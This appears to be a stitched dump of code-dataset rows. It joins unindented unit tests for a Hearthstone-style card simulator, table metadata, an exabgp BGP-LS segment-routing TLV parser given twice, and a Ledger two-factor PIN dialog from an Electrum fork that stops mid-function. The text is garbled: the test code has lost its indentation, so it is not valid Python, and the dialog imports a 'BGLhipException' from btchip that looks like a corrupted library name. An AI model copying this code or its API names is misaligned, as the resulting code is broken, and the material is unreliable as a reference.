game = generate_game_for([ManaTideTotem, WarGolem], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(25, game.players[0].deck.left)
self.assertEqual(0, len(game.players[0].minions))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Mana Tide Totem", game.players[0].minions[0].card.name)
self.assertEqual(23, game.players[0].deck.left)
game.play_single_turn()
game.players[0].minions[0].silence()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(22, game.players[0].deck.left)
def test_UnboundElemental(self):
game = generate_game_for([UnboundElemental, DustDevil, DustDevil], StonetuskBoar, OneCardPlayingAgent,
DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Unbound Elemental", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(4, game.players[0].minions[0].calculate_max_health())
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[-1].calculate_attack())
self.assertEqual(5, game.players[0].minions[-1].calculate_max_health())
game.players[0].minions[-1].silence()
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
def test_Windspeaker(self):
game = generate_game_for([StonetuskBoar, Windspeaker], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
self.assertFalse(game.players[0].minions[0].windfury())
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Windspeaker", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[1].windfury())
def test_AncestralHealing(self):
game = generate_game_for([FlametongueTotem, AncestralHealing], StonetuskBoar,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Flametongue Totem", game.players[0].minions[0].card.name)
self.assertEqual(3, game.players[0].minions[0].health)
self.assertFalse(game.players[0].minions[0].taunt)
game.players[0].minions[0].health = 1
game.play_single_turn()
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
def test_AncestralSpirit(self):
game = generate_game_for([ArgentCommander, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
game.players[0].minions[0].health = 1
game.players[0].minions[0].divine_shield = False
commander = game.players[0].minions[0]
commander.die(None)
commander.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
def test_AncestralSpiritDeathrattle(self):
game = generate_game_for([LootHoarder, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
loot = game.players[0].minions[0]
loot.die(None)
loot.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, len(game.players[0].hand))
def test_Bloodlust(self):
game = generate_game_for([StonetuskBoar, StonetuskBoar, StonetuskBoar, StonetuskBoar, Bloodlust], StonetuskBoar,
MinionAttackingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(20, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(4, game.players[1].hero.health)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
def test_EarthShock(self):
game = generate_game_for(EarthShock, ArgentSquire, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertTrue(game.players[1].minions[0].divine_shield)
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
def test_FarSight(self):
game = generate_game_for(FarSight, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(0, game.players[0].hand[-1].mana_cost())
self.assertEqual(3, game.players[0].hand[0].mana_cost())
game.players[0].draw()
self.assertEqual(3, game.players[0].hand[-1].mana_cost())
# Our old card shouldn't have been affected
self.assertEqual(0, game.players[0].hand[-2].mana_cost())
def test_FeralSpirit(self):
game = generate_game_for(FeralSpirit, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].card.mana)
self.assertEqual(2, game.players[0].minions[1].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].health)
self.assertTrue(game.players[0].minions[1].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[1].card.name)
self.assertEqual(2, game.players[0].minions[1].card.mana)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_VitalityTotem(self):
game = generate_game_for(VitalityTotem, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
game.players[0].hero.health = 20
game.play_single_turn()
game.play_single_turn()
self.assertEqual(24, game.players[0].hero.health)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(2, len(game.players[0].minions))
def test_ForkedLightning(self):
game = generate_game_for(ForkedLightning, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(2, len(game.players[1].minions))
# Forked Lightning should be played
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(2, game.players[0].upcoming_overload)
def test_FrostShock(self):
game = generate_game_for(FrostShock, StonetuskBoar, CardTestingAgent, DoNothingAgent)
# Frost Shock should be played
game.play_single_turn()
self.assertEqual(29, game.players[1].hero.health)
self.assertTrue(game.players[1].hero.frozen)
def test_Hex(self):
game = generate_game_for(ChillwindYeti, Hex, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].taunt)
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(5, game.players[0].minions[0].health)
self.assertEqual("Chillwind Yeti", game.players[0].minions[0].card.name)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual("Frog", game.players[0].minions[0].card.name)
self.assertEqual(MINION_TYPE.BEAST, game.players[0].minions[0].card.minion_type)
def test_LavaBurst(self):
game = generate_game_for(LavaBurst, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_LightningBolt(self):
game = generate_game_for(LightningBolt, StonetuskBoar, CardTestingAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_LightningStorm(self):
game = generate_game_for(LightningStorm, Shieldbearer, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
# Lightning Storm should be played
game.play_single_turn()
self.assertEqual(3, len(game.players[1].minions))
self.assertEqual(1, game.players[1].minions[0].health)
self.assertEqual(2, game.players[1].minions[1].health)
self.assertEqual(2, game.players[1].minions[2].health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_RockbiterWeapon(self):
game = generate_game_for(RockbiterWeapon, Shieldbearer, PlayAndAttackAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
# Rockbiter Weapon should be played and used
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
def test_RockbiterWeapon_and_Hex(self):
game = generate_game_for([IronfurGrizzly, RockbiterWeapon, Hex], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Frog", game.current_player.minions[0].card.name)
def test_RockbiterWeapon_and_BaronGeddon(self):
game = generate_game_for([BaronGeddon, RecklessRocketeer, RockbiterWeapon], StonetuskBoar,
PlayAndAttackAgent, DoNothingAgent)
for turn in range(15):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Baron Geddon", game.current_player.minions[0].card.name)
self.assertEqual(11, game.other_player.hero.health)
def test_TotemicMight(self):
game = generate_game_for([TotemicMight, StonetuskBoar], Shieldbearer, PredictableAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
# Hero power and Totemic Might should be played
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_max_health())
self.assertEqual("Stoneclaw Totem", game.players[0].minions[1].card.name)
self.assertEqual(4, game.players[0].minions[1].calculate_max_health())
def test_Windfury(self):
game = generate_game_for(Windfury, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertFalse(game.players[1].minions[0].windfury())
# Windfury should be played
game.play_single_turn()
self.assertTrue(game.players[1].minions[0].windfury())
def test_Doomhammer(self):
game = generate_game_for(Doomhammer, StonetuskBoar, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
self.assertFalse(game.players[0].hero.windfury())
# Doomhammer should be played
game.play_single_turn()
self.assertTrue(game.players[0].hero.windfury())
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(6, game.players[0].weapon.durability)
self.assertEqual(2, game.players[0].upcoming_overload)
self.assertEqual(26, game.players[1].hero.health)
def test_StormforgedAxe(self):
game = generate_game_for(StormforgedAxe, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(3, game.players[0].weapon.durability)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_Crackle(self):
game = generate_game_for(Crackle, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_SiltfinSpiritwalker(self):
game = generate_game_for([MurlocTidecaller, MurlocTidehunter, SiltfinSpiritwalker, Deathwing],
[MurlocTidecaller, Hellfire, BaneOfDoom], OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
# Play Siltfin
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(4, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
# Hellfire will kill all the murlocs but the siltfin.
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(7, len(game.other_player.hand))
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(7, len(game.current_player.hand))
def test_WhirlingZapOMatic(self):
game = generate_game_for(WhirlingZapomatic, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Whirling Zap-o-matic", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
def test_DunemaulShaman(self):
game = generate_game_for(DunemaulShaman,
[StonetuskBoar, GoldshireFootman, SilverbackPatriarch, MogushanWarden],
PlayAndAttackAgent, OneCardPlayingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
game.play_single_turn()
# The shaman's forgetful ability triggers once. It hits the warden one time (its intended target)
# and the footman one time (after triggering forgetful)
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual("Mogu'shan Warden", game.other_player.minions[0].card.name)
self.assertEqual("Silverback Patriarch", game.other_player.minions[1].card.name)
self.assertEqual("Stonetusk Boar", game.other_player.minions[2].card.name)
self.assertEqual(30, game.other_player.hero.health)
def test_Powermace(self):
game = generate_game_for([Powermace, SpiderTank, SpiderTank], Wisp, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(3, game.players[0].weapon.base_attack)
self.assertEqual(1, game.players[0].weapon.durability)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(24, game.players[1].hero.health)
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_Neptulon(self):
game = generate_game_for([TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin,
Neptulon], Wisp, CardTestingAgent, DoNothingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(0, len(game.players[0].hand))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
for card in game.players[0].hand:
self.assertEqual(MINION_TYPE.MURLOC, card.minion_type)
def test_AncestorsCall(self):
game = generate_game_for([AncestorsCall, StonetuskBoar], [Doomguard, Soulfire],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Stonetusk Boar", game.current_player.minions[0].card.name)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual("Doomguard", game.other_player.minions[0].card.name)
self.assertEqual(5, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
def test_LavaShock(self):
game = generate_game_for([Doomhammer, LightningBolt, LavaShock], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(11):
game.play_single_turn()
# The player should have been able to do everything AND have three mana left over
self.assertEqual(25, game.other_player.hero.health)
self.assertEqual(3, game.current_player.mana)
def test_FireguardDestroyer(self):
game = generate_game_for(FireguardDestroyer, Wisp, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(6, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(7, len(game.players[0].minions)) # Well, I was trying to get a 7/6 but no luck
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_AncestralKnowledge(self):
game = generate_game_for(AncestralKnowledge, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(6, len(game.current_player.hand))
self.assertEqual(2, game.current_player.upcoming_overload)
| true
| true
|
1c4208b6ad9a7e5b1a47d5852047900afcc2793d
| 3,146
|
py
|
Python
|
lib/exabgp/bgp/message/update/attribute/bgpls/link/sradjlan.py
|
fser/exabgp
|
9a41b5f833a00a4d56b1a38f73858d62685065dd
|
[
"BSD-3-Clause"
] | 2
|
2018-02-07T14:49:11.000Z
|
2021-09-08T15:31:51.000Z
|
lib/exabgp/bgp/message/update/attribute/bgpls/link/sradjlan.py
|
fser/exabgp
|
9a41b5f833a00a4d56b1a38f73858d62685065dd
|
[
"BSD-3-Clause"
] | null | null | null |
lib/exabgp/bgp/message/update/attribute/bgpls/link/sradjlan.py
|
fser/exabgp
|
9a41b5f833a00a4d56b1a38f73858d62685065dd
|
[
"BSD-3-Clause"
] | 1
|
2020-07-23T16:54:01.000Z
|
2020-07-23T16:54:01.000Z
|
# encoding: utf-8
"""
sradjlan.py
Created by Evelio Vila
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
"""
import json
from struct import unpack
from exabgp.vendoring import six
from exabgp.vendoring.bitstring import BitArray
from exabgp.protocol.iso import ISO
from exabgp.bgp.message.update.attribute.bgpls.linkstate import LINKSTATE, LsGenericFlags
from exabgp.bgp.message.notification import Notify
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Flags | Weight | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | OSPF Neighbor ID / IS-IS System-ID |
# + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | SID/Label/Index (variable) |
# +---------------------------------------------------------------+
# draft-gredler-idr-bgp-ls-segment-routing-ext-03
@LINKSTATE.register()
class SrAdjacencyLan(object):
TLV = 1100
def __init__ (self, flags, sids, weight):
self.flags = flags
self.sids = sids
self.weight = weight
def __repr__ (self):
return "sr_adj_lan_flags: %s, sids: %s" % (self.flags, self.sids)
@classmethod
def unpack (cls,data,length):
# We only support IS-IS flags for now.
flags = LsGenericFlags.unpack(data[0:1],LsGenericFlags.ISIS_SR_ADJ_FLAGS)
# Parse adj weight
weight = six.indexbytes(data,1)
# Move pointer 4 bytes: Flags(1) + Weight(1) + Reserved(2)
data = data[4:]
isis_system_id = ISO.unpack_sysid(data[:6])
# SID/Index/Label: according to the V and L flags, it contains
# either:
# * A 3 octet local label where the 20 rightmost bits are used for
# encoding the label value. In this case the V and L flags MUST
# be set.
#
# * A 4 octet index defining the offset in the SID/Label space
# advertised by this router using the encodings defined in
# Section 3.1. In this case V and L flags MUST be unset.
sids = []
while data:
# Range Size: 3 octet value indicating the number of labels in
# the range.
if int(flags.flags['V']) and int(flags.flags['L']):
b = BitArray(bytes=data[:3])
sid = b.unpack('uintbe:24')[0]
data = data[3:]
elif (not flags.flags['V']) and \
(not flags.flags['L']):
sid = unpack('!I',data[:4])[0]
data = data[4:]
sids.append(sid)
return cls(flags=flags, sids=sids, weight=weight)
def json (self,compact=None):
return ', '.join(['"sr-adj-lan-flags": {}'.format(self.flags.json()),
'"sids": {}'.format(json.dumps(self.sids)),
'"sr-adj-lan-weight": {}'.format(json.dumps(self.weight))])
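The ASCII layout above maps directly onto a fixed header followed by a variable SID field. As a rough stdlib-only illustration (a hypothetical helper, independent of exabgp's LsGenericFlags/ISO classes, and assuming a single SID per TLV):

from struct import unpack

def parse_sr_adj_lan(data):
    # Flags(1) + Weight(1) + Reserved(2), then the 6-octet OSPF Neighbor ID /
    # IS-IS System-ID, then one SID/Label/Index field.
    flags, weight = unpack('!BBxx', data[:4])
    neighbor_id = data[4:10]
    sid_field = data[10:]
    if len(sid_field) == 3:
        # 3-octet local label: only the 20 rightmost bits carry the value (V and L set).
        return flags, weight, neighbor_id, unpack('!I', b'\x00' + sid_field)[0] & 0xFFFFF
    # 4-octet index into the advertised SID/Label space (V and L unset).
    return flags, weight, neighbor_id, unpack('!I', sid_field[:4])[0]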
| 36.581395
| 89
| 0.508264
|
import json
from struct import unpack
from exabgp.vendoring import six
from exabgp.vendoring.bitstring import BitArray
from exabgp.protocol.iso import ISO
from exabgp.bgp.message.update.attribute.bgpls.linkstate import LINKSTATE, LsGenericFlags
from exabgp.bgp.message.notification import Notify
@LINKSTATE.register()
class SrAdjacencyLan(object):
TLV = 1100
def __init__ (self, flags, sids, weight):
self.flags = flags
self.sids = sids
self.weight = weight
def __repr__ (self):
return "sr_adj_lan_flags: %s, sids: %s" % (self.flags, self.sids)
@classmethod
def unpack (cls,data,length):
flags = LsGenericFlags.unpack(data[0:1],LsGenericFlags.ISIS_SR_ADJ_FLAGS)
weight = six.indexbytes(data,1)
data = data[4:]
isis_system_id = ISO.unpack_sysid(data[:6])
sids = []
while data:
if int(flags.flags['V']) and int(flags.flags['L']):
b = BitArray(bytes=data[:3])
sid = b.unpack('uintbe:24')[0]
data = data[3:]
elif (not flags.flags['V']) and \
(not flags.flags['L']):
sid = unpack('!I',data[:4])[0]
data = data[4:]
sids.append(sid)
return cls(flags=flags, sids=sids, weight=weight)
def json (self,compact=None):
return ', '.join(['"sr-adj-lan-flags": {}'.format(self.flags.json()),
'"sids": {}'.format(json.dumps(self.sids)),
'"sr-adj-lan-weight": {}'.format(json.dumps(self.weight))])
| true
| true
|
1c4209296b5062a78da810907578479114e202ca
| 7,060
|
py
|
Python
|
electrum/plugins/ledger/auth2fa.py
|
lucasan123/electrum-bitgesell
|
92eb2c28035aa96674d50b611ac9de0382adbc2b
|
[
"MIT"
] | null | null | null |
electrum/plugins/ledger/auth2fa.py
|
lucasan123/electrum-bitgesell
|
92eb2c28035aa96674d50b611ac9de0382adbc2b
|
[
"MIT"
] | 1
|
2020-08-26T20:31:21.000Z
|
2020-08-26T20:32:32.000Z
|
electrum/plugins/ledger/auth2fa.py
|
lucasan123/electrum-bitgesell
|
92eb2c28035aa96674d50b611ac9de0382adbc2b
|
[
"MIT"
] | null | null | null |
import copy
from PyQt5.QtWidgets import (QDialog, QLineEdit, QTextEdit, QVBoxLayout, QLabel,
QWidget, QHBoxLayout, QComboBox)
from btchip.btchip import BGLhipException
from electrum.gui.qt.util import PasswordLineEdit
from electrum.i18n import _
from electrum import constants, bitgesell
from electrum.logging import get_logger
_logger = get_logger(__name__)
DEBUG = False
helpTxt = [_("Your Ledger Wallet wants to tell you a one-time PIN code.<br><br>" \
"For best security you should unplug your device, open a text editor on another computer, " \
"put your cursor into it, and plug your device into that computer. " \
"It will output a summary of the transaction being signed and a one-time PIN.<br><br>" \
"Verify the transaction summary and type the PIN code here.<br><br>" \
"Before pressing enter, plug the device back into this computer.<br>" ),
_("Verify the address below.<br>Type the character from your security card corresponding to the <u><b>BOLD</b></u> character."),
]
class LedgerAuthDialog(QDialog):
def __init__(self, handler, data):
'''Ask user for 2nd factor authentication. Support text and security card methods.
Use last method from settings, but support downgrade.
'''
QDialog.__init__(self, handler.top_level_window())
self.handler = handler
self.txdata = data
self.idxs = self.txdata['keycardData'] if self.txdata['confirmationType'] > 1 else ''
self.setMinimumWidth(650)
self.setWindowTitle(_("Ledger Wallet Authentication"))
self.cfg = copy.deepcopy(self.handler.win.wallet.get_keystore().cfg)
self.dongle = self.handler.win.wallet.get_keystore().get_client().dongle
self.pin = ''
self.devmode = self.getDevice2FAMode()
if self.devmode == 0x11 or self.txdata['confirmationType'] == 1:
self.cfg['mode'] = 0
vbox = QVBoxLayout()
self.setLayout(vbox)
def on_change_mode(idx):
self.cfg['mode'] = 0 if self.devmode == 0x11 else idx if idx > 0 else 1
if self.cfg['mode'] > 0:
self.handler.win.wallet.get_keystore().cfg = self.cfg
self.handler.win.wallet.save_keystore()
self.update_dlg()
def return_pin():
self.pin = self.pintxt.text() if self.txdata['confirmationType'] == 1 else self.cardtxt.text()
if self.cfg['mode'] == 1:
self.pin = ''.join(chr(int(str(i),16)) for i in self.pin)
self.accept()
self.modebox = QWidget()
modelayout = QHBoxLayout()
self.modebox.setLayout(modelayout)
modelayout.addWidget(QLabel(_("Method:")))
self.modes = QComboBox()
modelayout.addWidget(self.modes, 2)
modelayout.addStretch(1)
self.modebox.setMaximumHeight(50)
vbox.addWidget(self.modebox)
self.populate_modes()
self.modes.currentIndexChanged.connect(on_change_mode)
self.helpmsg = QTextEdit()
self.helpmsg.setStyleSheet("QTextEdit { color:black; background-color: lightgray; }")
self.helpmsg.setReadOnly(True)
vbox.addWidget(self.helpmsg)
self.pinbox = QWidget()
pinlayout = QHBoxLayout()
self.pinbox.setLayout(pinlayout)
self.pintxt = PasswordLineEdit()
self.pintxt.setMaxLength(4)
self.pintxt.returnPressed.connect(return_pin)
pinlayout.addWidget(QLabel(_("Enter PIN:")))
pinlayout.addWidget(self.pintxt)
pinlayout.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
pinlayout.addStretch(1)
self.pinbox.setVisible(self.cfg['mode'] == 0)
vbox.addWidget(self.pinbox)
self.cardbox = QWidget()
card = QVBoxLayout()
self.cardbox.setLayout(card)
self.addrtext = QTextEdit()
self.addrtext.setStyleSheet('''
QTextEdit {
color:blue; background-color:lightgray; padding:15px 10px; border:none;
font-size:20pt; font-family: "Courier New", monospace; }
''')
self.addrtext.setReadOnly(True)
self.addrtext.setMaximumHeight(130)
card.addWidget(self.addrtext)
def pin_changed(s):
if len(s) < len(self.idxs):
i = self.idxs[len(s)]
addr = self.txdata['address']
if not constants.net.TESTNET:
text = addr[:i] + '<u><b>' + addr[i:i+1] + '</u></b>' + addr[i+1:]
else:
# pin needs to be created from mainnet address
addr_mainnet = bitgesell.script_to_address(bitgesell.address_to_script(addr), net=constants.BitgesellMainnet)
addr_mainnet = addr_mainnet[:i] + '<u><b>' + addr_mainnet[i:i+1] + '</u></b>' + addr_mainnet[i+1:]
text = str(addr) + '\n' + str(addr_mainnet)
self.addrtext.setHtml(str(text))
else:
self.addrtext.setHtml(_("Press Enter"))
pin_changed('')
cardpin = QHBoxLayout()
cardpin.addWidget(QLabel(_("Enter PIN:")))
self.cardtxt = PasswordLineEdit()
self.cardtxt.setMaxLength(len(self.idxs))
self.cardtxt.textChanged.connect(pin_changed)
self.cardtxt.returnPressed.connect(return_pin)
cardpin.addWidget(self.cardtxt)
cardpin.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
cardpin.addStretch(1)
card.addLayout(cardpin)
self.cardbox.setVisible(self.cfg['mode'] == 1)
vbox.addWidget(self.cardbox)
self.update_dlg()
def populate_modes(self):
self.modes.blockSignals(True)
self.modes.clear()
self.modes.addItem(_("Summary Text PIN (requires dongle replugging)") if self.txdata['confirmationType'] == 1 else _("Summary Text PIN is Disabled"))
if self.txdata['confirmationType'] > 1:
self.modes.addItem(_("Security Card Challenge"))
self.modes.blockSignals(False)
def update_dlg(self):
self.modes.setCurrentIndex(self.cfg['mode'])
self.modebox.setVisible(True)
self.helpmsg.setText(helpTxt[self.cfg['mode']])
self.helpmsg.setMinimumHeight(180 if self.txdata['confirmationType'] == 1 else 100)
self.helpmsg.setVisible(True)
self.pinbox.setVisible(self.cfg['mode'] == 0)
self.cardbox.setVisible(self.cfg['mode'] == 1)
self.pintxt.setFocus(True) if self.cfg['mode'] == 0 else self.cardtxt.setFocus(True)
self.setMaximumHeight(400)
def getDevice2FAMode(self):
apdu = [0xe0, 0x24, 0x01, 0x00, 0x00, 0x01] # get 2fa mode
try:
mode = self.dongle.exchange( bytearray(apdu) )
return mode
except BGLhipException as e:
_logger.debug('Device getMode Failed')
return 0x11
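The security-card branch of pin_changed above amounts to highlighting one address character per keystroke: the character at index idxs[len(typed)] is the one the user looks up on the card next. A minimal stand-alone sketch of that logic (hypothetical helper, not part of the plugin):

def highlight_next_char(address, idxs, typed_so_far):
    # Bold the address character the user must look up for the next keystroke.
    if len(typed_so_far) >= len(idxs):
        return "Press Enter"
    i = idxs[len(typed_so_far)]
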